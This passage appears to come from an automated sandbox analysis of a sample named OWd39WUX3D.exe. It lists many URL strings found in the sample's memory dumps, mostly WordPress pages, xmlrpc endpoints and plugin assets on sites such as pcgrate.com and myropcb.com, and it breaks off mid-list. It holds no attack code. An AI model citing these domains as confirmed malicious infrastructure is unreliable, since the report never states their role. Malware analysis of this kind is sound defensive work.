              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.myropcb.com%2F&format=xml
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-json/wp/v2/pages/28
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/xmlrpc.php
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/xmlrpc.php?rsd
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.naoi-a.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.393078674.0000000006B7C000.00000004.00000020.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.393286215.0000000006B7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.netcr.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.00000000008FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.nqks.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.00000000008FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.nqks.com/m/
              Source: OWd39WUX3D.exe, 00000000.00000003.482722234.0000000006B32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.olras.com/m/
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ora-ito.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ora-ito.com/~
              Source: OWd39WUX3D.exe, 00000000.00000003.482754637.0000000006B8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ottospm.com/xmlrpc.php
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/E
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-gdpr.css?ver=2.
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-public.css?ver=
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-table.css?ver=2
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/cookie-law-info/public/js/cookie-law-info-public.js?ver=2.
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/download-now-for-woocommerce/assets/css/somdn-style.css?ve
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/download-now-for-woocommerce/assets/js/somdn_script.js?ver
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 